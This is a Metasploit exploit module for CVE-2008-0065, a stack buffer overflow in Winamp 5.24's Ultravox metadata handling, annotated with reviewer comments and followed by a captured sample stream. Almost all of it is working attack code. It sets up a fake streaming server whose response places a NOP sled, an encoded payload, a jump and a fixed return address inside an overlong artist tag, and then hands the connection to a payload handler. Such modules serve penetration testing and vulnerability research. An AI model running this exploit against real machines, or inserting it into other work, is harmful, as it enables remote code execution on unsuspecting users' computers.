winamp_ultravox.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Exploit module for CVE-2008-0065: a stack buffer overflow in Winamp 5.24's
# Ultravox stream handling. The module acts as a fake Ultravox/HTTP server;
# when a client connects it answers with a single oversized <artist> tag.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  # Server-side module: we listen and wait for the vulnerable client to connect.
  include Msf::Exploit::Remote::TcpServer

  # Module metadata and options.
  #
  # @param info [Hash] base module info merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow',
      'Description' => %q{
        This module exploits a stack buffer overflow in Winamp 5.24. By
        sending an overly long artist tag, a remote attacker may
        be able to execute arbitrary code. This vulnerability can be
        exploited from the browser or the Winamp client itself.
      },
      'Author' => 'MC',
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2008-0065' ],
          [ 'OSVDB', '41707' ],
          [ 'BID', '27344' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload' =>
        {
          # The payload is embedded in an XML tag inside an HTTP body, so the
          # space is capped and the bad-char list excludes bytes that would
          # presumably break the XML/HTTP framing (NUL, whitespace, quotes,
          # '<', '>', '&', '%', '/', etc.).
          'Space' => 700,
          'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
          'StackAdjustment' => -3500,
          # NOTE(review): looks like `add esp, 0xffffefff ; inc esp` — moves the
          # stack pointer away from the buffer before the encoder runs; confirm.
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
        },
      'Platform' => 'win',
      'Targets' =>
        [
          # Fixed return address; presumably inside in_mp3.dll per the module
          # title — not verifiable from this file.
          [ 'Winamp 5.24', { 'Ret' => 0x15010d3e } ],
        ],
      'Privileged' => false,
      'DisclosureDate' => '2008-01-18',
      'DefaultTarget' => 0))

    register_options(
      [
        # Port the fake Ultravox server listens on; 8080 by default.
        OptPort.new('SRVPORT', [ true, "The HTTP daemon port to listen on.", 8080 ])
      ])
  end

  # TcpServer hook: builds and sends the malicious Ultravox response to one
  # connecting client, then hands the connection to the payload handler.
  #
  # @param client [Rex::Socket] the connected client socket
  def on_client_connect(client)
    # Bail out if a payload cannot be generated for this client.
    # NOTE(review): `p` is assigned but never read — the body below uses
    # `payload.encoded` instead; the two are presumably equivalent here.
    return if ((p = regenerate_payload(client)) == nil)

    # Consume the client's request. Its contents are not inspected (`res`
    # is unused), so no check is made that it is an Ultravox/HTTP request.
    res = client.get_once

    # Metadata message body: a 6-byte prefix, then the XML whose <artist>
    # value overflows the stack buffer. The nop sled is sized so that
    # sled + payload is always exactly 3828 bytes.
    content = "\x00\x01\x00\x01\x00\x01" + "<metadata><song><artist>"
    content << make_nops(3828 - payload.encoded.length) + payload.encoded
    # Short jump over the saved return address (packed little-endian 32-bit).
    content << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')
    # 0xe8 followed by a little-endian 32-bit -850 (reads as an x86 CALL rel32
    # back into the buffer — confirm), then uppercase alpha filler.
    content << [0xe8, -850].pack('CV') + rand_text_alpha_upper(1183)
    content << "</artist></song></metadata>"

    # Ultravox frame: 4-byte header, 16-bit big-endian body length ('n'),
    # body, trailing NUL. With the literal sizes above the body is about
    # 5 KB, so it fits the 16-bit length field.
    sploit = "\x5a\x00\x39\x01" + [content.length].pack('n')
    sploit << content + "\x00"

    # randomize some stuff.
    # One random number (0..65534) is reused for every numeric header so the
    # response is not byte-identical across runs.
    num = rand(65535).to_s
    header = "HTTP/1.0 200 OK\r\n"
    header << "Server: Ultravox 3.0\r\n"
    header << "Content-Type: misc/ultravox\r\n"
    header << "Ultravox-SID: #{num}\r\n"
    header << "Ultravox-Avg-Bitrate: #{num}\r\n"
    header << "Ultravox-Max-Bitrate: #{num}\r\n"
    header << "Ultravox-Max-Msg: #{num}\r\n"
    header << "Ultravox-Stream-Info: Ultravox;Live Stream\r\n"
    header << "Ultravox-Msg-Que: #{num}\r\n"
    header << "Ultravox-Max-Fragments: 1\r\n\r\n"
    header << sploit

    print_status("Sending #{header.length} bytes")
    client.put(header)

    # Let the payload handler take over the session, then drop the client.
    handler(client)
    service.close_client(client)
  end
end
=begin
HTTP/1.0 200
.Server: Ultravo
x 3.0..Content-T
ype: misc/ultrav
ox..Ultravox-SID
: 22221..Ultravo
x-Avg-Bitrate: 6
4000..Ultravox-M
ax-Bitrate: 9600
0..Ultravox-Max-
Msg: 16000..Ultr
avox-Stream-Info
: Ultravox;Live
Stream..Ultravox
-Msg-Que: 39..Ul
travox-Max-Fragm
Z.9..,......<met
adata><length>0<
/length><soon>Mo
re on
</soon><song><na
me>The Night
ghts In
tin</name><album
>Days Of
Passed</album><a
rtist>The Moody
Blues</artist><a
lbum_art>xm/stat
ion_logo_WBCRHT.
jpg</album_art><
album_art_200>xm
/station_logo_WB
CRHT_200.jpg</al
bum_art_200><ser
ial>-1</serial><
song_id>-1</song
_id><amg_song_id
>-1</amg_song_id
><amg_artist_id>
-1</amg_artist_i
d><amg_album_id>
-1</amg_album_id
><itunes_song_id
>-1</itunes_song
_id><itunes_arti
st_id>-1</itunes
_artist_id><itun
es_album_id>-1</
itunes_album_id>
</song></metadat
a>.Z.......\./!.
!.UP.......B...&
Z....D)ydB.,.vy/
=end